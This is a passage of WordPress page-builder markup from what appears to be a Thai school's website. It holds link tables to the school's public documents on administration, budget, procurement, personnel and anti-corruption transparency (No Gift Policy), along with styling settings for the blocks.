ธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e